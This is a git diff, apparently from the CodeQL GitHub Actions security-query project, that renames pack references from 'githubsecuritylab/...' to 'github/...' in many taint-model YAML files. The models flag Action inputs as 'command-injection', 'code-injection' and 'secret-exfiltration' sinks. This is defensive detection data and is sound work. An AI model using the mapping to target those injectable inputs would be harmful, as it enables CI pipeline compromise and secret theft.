.../reusable-workflows/getporter_porter.model.yml | 2 +- .../reusable-workflows/getsentry_sentry-dart.model.yml | 2 +- .../reusable-workflows/getsentry_sentry-unity.model.yml | 2 +- .../reusable-workflows/gitpod-io_gitpod.model.yml | 2 +- .../reusable-workflows/gittools_gitversion.model.yml | 2 +- .../googlecloudplatform_magic-modules.model.yml | 2 +- .../googlecloudplatform_nodejs-docs-samples.model.yml | 2 +- .../reusable-workflows/gravitational_teleport.model.yml | 2 +- .../reusable-workflows/gravitl_netmaker.model.yml | 2 +- .../ext/generated/reusable-workflows/h2oai_wave.model.yml | 2 +- .../reusable-workflows/hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../reusable-workflows/hashicorp_boundary.model.yml | 2 +- .../reusable-workflows/hashicorp_consul.model.yml | 2 +- .../reusable-workflows/hashicorp_terraform-cdk.model.yml | 2 +- .../hashicorp_terraform-provider-tfe.model.yml | 2 +- .../reusable-workflows/hashicorp_terraform.model.yml | 2 +- .../reusable-workflows/hashicorp_vault.model.yml | 4 ++-- .../ext/generated/reusable-workflows/heroku_cli.model.yml | 2 +- .../reusable-workflows/hitobito_hitobito.model.yml | 4 ++-- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../reusable-workflows/huggingface_doc-builder.model.yml | 2 +- .../reusable-workflows/huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../ext/generated/reusable-workflows/ibm_sarama.model.yml | 2 +- ...d-photos-downloader_icloud_photos_downloader.model.yml | 2 +- .../reusable-workflows/immich-app_immich.model.yml | 2 +- .../generated/reusable-workflows/inria_spoon.model.yml | 2 +- .../intel_intel-device-plugins-for-kubernetes.model.yml | 2 +- .../reusable-workflows/inverse-inc_packetfence.model.yml | 2 +- .../ext/generated/reusable-workflows/ispc_ispc.model.yml | 2 +- .../jetbrains_intellij-platform-gradle-plugin.model.yml | 2 +- .../reusable-workflows/jupyter_docker-stacks.model.yml | 2 +- .../reusable-workflows/kairos-io_kairos.model.yml | 2 +- .../generated/reusable-workflows/kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../generated/reusable-workflows/kiali_kiali.model.yml | 2 +- .../generated/reusable-workflows/kotest_kotest.model.yml | 2 +- .../reusable-workflows/kubernetes_ingress-nginx.model.yml | 2 +- .../reusable-workflows/kubescape_kubescape.model.yml | 2 +- .../reusable-workflows/kubeshop_botkube.model.yml | 4 ++-- .../generated/reusable-workflows/kumahq_kuma.model.yml | 2 +- .../generated/reusable-workflows/labring_sealos.model.yml | 2 +- .../reusable-workflows/laion-ai_open-assistant.model.yml | 2 +- .../reusable-workflows/learningequality_kolibri.model.yml | 2 +- .../reusable-workflows/lensesio_stream-reactor.model.yml | 2 +- .../reusable-workflows/leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../reusable-workflows/liquibase_liquibase.model.yml | 2 +- .../reusable-workflows/litestar-org_litestar.model.yml | 2 +- .../ext/generated/reusable-workflows/llvm_circt.model.yml | 2 +- .../generated/reusable-workflows/lnbits_lnbits.model.yml | 2 +- .../generated/reusable-workflows/lutris_lutris.model.yml | 2 +- .../generated/reusable-workflows/mailu_mailu.model.yml | 2 +- .../reusable-workflows/mamba-org_mamba.model.yml | 2 +- .../manticoresoftware_manticoresearch.model.yml | 2 +- .../reusable-workflows/marcelotduarte_cx_freeze.model.yml | 2 +- ...rialdesigninxaml_materialdesigninxamltoolkit.model.yml | 2 +- .../reusable-workflows/matter-labs_zksync-era.model.yml | 2 +- .../reusable-workflows/mattermost_desktop.model.yml | 2 +- .../reusable-workflows/mattermost_mattermost.model.yml | 2 +- .../reusable-workflows/mealie-recipes_mealie.model.yml | 2 +- .../reusable-workflows/meshery_meshery.model.yml | 2 +- .../reusable-workflows/meshtastic_firmware.model.yml | 2 +- .../reusable-workflows/microcks_microcks.model.yml | 2 +- .../microsoft_applicationinsights-java.model.yml | 2 +- .../reusable-workflows/microsoft_chat-copilot.model.yml | 2 +- .../reusable-workflows/microsoft_msquic.model.yml | 2 +- .../generated/reusable-workflows/microsoft_oryx.model.yml | 2 +- .../reusable-workflows/microsoft_pr-metrics.model.yml | 2 +- .../microsoft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../generated/reusable-workflows/moby_buildkit.model.yml | 2 +- .../ext/generated/reusable-workflows/moby_moby.model.yml | 2 +- .../reusable-workflows/mosaicml_composer.model.yml | 2 +- .../reusable-workflows/msys2_setup-msys2.model.yml | 2 +- .../generated/reusable-workflows/mudler_localai.model.yml | 2 +- .../reusable-workflows/mustardchef_wsabuilds.model.yml | 2 +- .../ext/generated/reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../generated/reusable-workflows/napari_napari.model.yml | 2 +- .../generated/reusable-workflows/nasa_fprime.model.yml | 2 +- .../reusable-workflows/nautobot_nautobot.model.yml | 2 +- .../ext/generated/reusable-workflows/nektos_act.model.yml | 2 +- .../reusable-workflows/neondatabase_neon.model.yml | 2 +- .../generated/reusable-workflows/neovim_neovim.model.yml | 2 +- .../reusable-workflows/nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../reusable-workflows/newrelic_node-newrelic.model.yml | 2 +- .../reusable-workflows/nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../generated/reusable-workflows/nocodb_nocodb.model.yml | 2 +- .../generated/reusable-workflows/novuhq_novu.model.yml | 2 +- .../generated/reusable-workflows/npm_abbrev-js.model.yml | 2 +- ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml | 2 +- .../reusable-workflows/npm_fs-minipass.model.yml | 2 +- .../reusable-workflows/npm_hosted-git-info.model.yml | 2 +- ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml | 2 +- .../npm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../reusable-workflows/npm_mute-stream.model.yml | 2 +- .../reusable-workflows/npm_node-semver.model.yml | 2 +- .../generated/reusable-workflows/npm_node-which.model.yml | 2 +- .../ext/generated/reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../reusable-workflows/npm_write-file-atomic.model.yml | 2 +- .../generated/reusable-workflows/onflow_cadence.model.yml | 2 +- .../reusable-workflows/open-goal_jak-project.model.yml | 2 +- .../open-telemetry_opentelemetry-demo.model.yml | 2 +- .../open-telemetry_opentelemetry-dotnet-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...telemetry_opentelemetry-java-instrumentation.model.yml | 2 +- .../open-telemetry_opentelemetry-js-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-operator.model.yml | 2 +- .../reusable-workflows/openbao_openbao.model.yml | 2 +- .../reusable-workflows/openhab_openhab-docs.model.yml | 2 +- .../reusable-workflows/openmined_pysyft.model.yml | 2 +- .../reusable-workflows/opentofu_opentofu.model.yml | 2 +- .../reusable-workflows/openttd_openttd.model.yml | 2 +- .../reusable-workflows/openvinotoolkit_openvino.model.yml | 2 +- .../generated/reusable-workflows/openxla_iree.model.yml | 2 +- .../generated/reusable-workflows/openzfs_zfs.model.yml | 2 +- .../operator-framework_java-operator-sdk.model.yml | 2 +- .../reusable-workflows/orange-opensource_hurl.model.yml | 2 +- .../paolosalvatori_servicebusexplorer.model.yml | 2 +- .../reusable-workflows/parcel-bundler_parcel.model.yml | 2 +- .../reusable-workflows/pardeike_harmony.model.yml | 2 +- .../generated/reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../reusable-workflows/pennylaneai_pennylane.model.yml | 2 +- .../pinecone-io_pinecone-python-client.model.yml | 2 +- .../generated/reusable-workflows/pixie-io_pixie.model.yml | 2 +- .../reusable-workflows/plantuml_plantuml.model.yml | 2 +- .../generated/reusable-workflows/powerdns_pdns.model.yml | 2 +- .../reusable-workflows/preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../reusable-workflows/product-os_flowzone.model.yml | 2 +- .../reusable-workflows/project-oak_oak.model.yml | 2 +- .../ext/generated/reusable-workflows/prql_prql.model.yml | 2 +- .../generated/reusable-workflows/pulumi_pulumi.model.yml | 2 +- .../reusable-workflows/puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../generated/reusable-workflows/pyo3_maturin.model.yml | 2 +- .../ext/generated/reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../generated/reusable-workflows/python_cpython.model.yml | 2 +- .../reusable-workflows/pytorch_botorch.model.yml | 2 +- .../generated/reusable-workflows/pytorch_xla.model.yml | 2 +- .../reusable-workflows/quarto-dev_quarto-cli.model.yml | 2 +- .../reusable-workflows/rancher_dashboard.model.yml | 2 +- .../reusable-workflows/rasterio_rasterio.model.yml | 2 +- .../reusable-workflows/redisearch_redisearch.model.yml | 2 +- .../reusable-workflows/remix-run_remix.model.yml | 2 +- .../reusable-workflows/rmcrackan_libation.model.yml | 2 +- .../reusable-workflows/rocketchat_rocket.chat.model.yml | 2 +- .../generated/reusable-workflows/ruby_ruby.wasm.model.yml | 2 +- .../reusable-workflows/rustdesk_rustdesk.model.yml | 2 +- .../reusable-workflows/saadeghi_daisyui.model.yml | 2 +- .../generated/reusable-workflows/sagemath_sage.model.yml | 2 +- .../reusable-workflows/schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../reusable-workflows/seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../reusable-workflows/shimataro_ssh-key-action.model.yml | 2 +- .../reusable-workflows/softfever_orcaslicer.model.yml | 2 +- .../software-mansion_react-native-reanimated.model.yml | 2 +- .../reusable-workflows/solana-labs_solana.model.yml | 2 +- .../generated/reusable-workflows/sonarr_sonarr.model.yml | 2 +- .../reusable-workflows/speedb-io_speedb.model.yml | 2 +- .../spring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../reusable-workflows/sqlfluff_sqlfluff.model.yml | 2 +- .../reusable-workflows/stdlib-js_stdlib.model.yml | 2 +- .../reusable-workflows/stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../generated/reusable-workflows/supabase_auth.model.yml | 2 +- .../generated/reusable-workflows/supabase_cli.model.yml | 2 +- .../generated/reusable-workflows/tencent_hippy.model.yml | 4 ++-- .../reusable-workflows/tgstation_tgstation.model.yml | 2 +- .../reusable-workflows/thesofproject_sof.model.yml | 2 +- .../generated/reusable-workflows/tiann_kernelsu.model.yml | 2 +- .../reusable-workflows/tiledb-inc_tiledb.model.yml | 2 +- .../reusable-workflows/toeverything_affine.model.yml | 2 +- .../generated/reusable-workflows/tracel-ai_burn.model.yml | 2 +- .../reusable-workflows/tribler_tribler.model.yml | 2 +- .../reusable-workflows/ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../generated/reusable-workflows/urbit_urbit.model.yml | 2 +- .../reusable-workflows/uyuni-project_uyuni.model.yml | 2 +- .../reusable-workflows/vert-x3_vertx-hazelcast.model.yml | 2 +- .../ext/generated/reusable-workflows/vkcom_vkui.model.yml | 2 +- .../reusable-workflows/walletconnect_web3modal.model.yml | 2 +- .../reusable-workflows/warzone2100_warzone2100.model.yml | 2 +- .../reusable-workflows/wasmedge_wasmedge.model.yml | 2 +- .../reusable-workflows/web-infra-dev_rspack.model.yml | 2 +- .../ext/generated/reusable-workflows/werf_werf.model.yml | 2 +- .../reusable-workflows/widdix_aws-cf-templates.model.yml | 2 +- .../reusable-workflows/wildfly_wildfly.model.yml | 2 +- .../generated/reusable-workflows/yt-dlp_yt-dlp.model.yml | 2 +- .../generated/reusable-workflows/zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../reusable-workflows/zitadel_zitadel.model.yml | 4 ++-- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- ql/lib/ext/go-semantic-release_action.model.yml | 2 +- ql/lib/ext/golangci_golangci-lint-action.model.yml | 2 +- ql/lib/ext/gonuit_heroku-docker-deploy.model.yml | 2 +- ql/lib/ext/goreleaser_goreleaser-action.model.yml | 2 +- .../gr2m_create-or-update-pull-request-action.model.yml | 2 +- ql/lib/ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ql/lib/ext/jamesives_github-pages-deploy-action.model.yml | 2 +- ql/lib/ext/jitterbit_get-changed-files.model.yml | 2 +- ql/lib/ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- ql/lib/ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 ++-- ql/lib/ext/khan_pull-request-comment-trigger.model.yml | 2 +- ...arsoner_circleci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-luarocks.model.yml | 2 +- ql/lib/ext/lucasbento_auto-close-issues.model.yml | 2 +- .../ext/mad9000_actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- ql/lib/ext/manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 ++-- ql/lib/ext/meteorengineer_setup-meteor.model.yml | 2 +- ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 2 +- .../ext/mr-smithers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 ++-- ql/lib/ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- ql/lib/ext/paambaati_codeclimate-action.model.yml | 2 +- ql/lib/ext/peter-evans_create-pull-request.model.yml | 2 +- .../ext/peter-murray_issue-body-parser-action.model.yml | 2 +- ql/lib/ext/plasmicapp_plasmic-action.model.yml | 2 +- ql/lib/ext/preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ql/lib/ext/py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- .../ext/reactivecircus_android-emulator-runner.model.yml | 2 +- .../redhat-plumbers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- ql/lib/ext/renovatebot_github-action.model.yml | 2 +- ql/lib/ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 ++-- .../salsify_action-detect-and-tag-new-version.model.yml | 4 ++-- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 2 +- ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 2 +- ql/lib/ext/skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- ql/lib/ext/stackhawk_hawkscan-action.model.yml | 2 +- ql/lib/ext/step-security_harden-runner.model.yml | 2 +- ql/lib/ext/suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- ql/lib/ext/trilom_file-changes-action.model.yml | 2 +- ql/lib/ext/tripss_conventional-changelog-action.model.yml | 2 +- ql/lib/ext/tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- ql/lib/ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- ql/lib/ext/workflow-models/workflow-models.yml | 8 ++++---- ql/lib/ext/xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 4 ++-- ql/test/qlpack.yml | 6 +++--- 748 files changed, 777 insertions(+), 777 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 7bb3039fe48..7281eb9d9b5 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "javascript", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "github/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 08c4b420a4c..5b06b007d8a 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -26,7 +26,7 @@ export async function newCodeQL(): Promise { return { language: "javascript", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "github/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index b897e8f2c5a..5687a9729fc 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 3a5b34880b9..87620afac70 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 20abd532872..f02d8f5b180 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index dcc20433483..77df62717b0 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 3afd9991e07..abdcdd6d698 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 3deae2a9f19..ecfdbfb98a0 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7dd0459ab7f..ea7ab312528 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 721042aafaf..21ea405b32c 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index ee4dbaf2b55..1e95a8c0273 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 76ae920d255..1ecba6ef1a1 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 46f667d75a0..5d7cb6e0b91 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 4df6fe61a43..26b2e2eb693 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index aab329160ea..99324837e75 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 610d188f065..cd827ffc2f8 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index b571bded8ca..64abc03a5fb 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index cd8f4f73e49..63eb8b21249 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 6ebc3875e07..170ceb2f95c 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2b2dbd014b7..e050b61815e 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index 78b7eb1394c..7d646dece69 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index 0f146da2e0c..fb03722c16a 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index 483a3bf5172..a14748aead0 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index e06e75f7a3b..4caf23c8812 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", 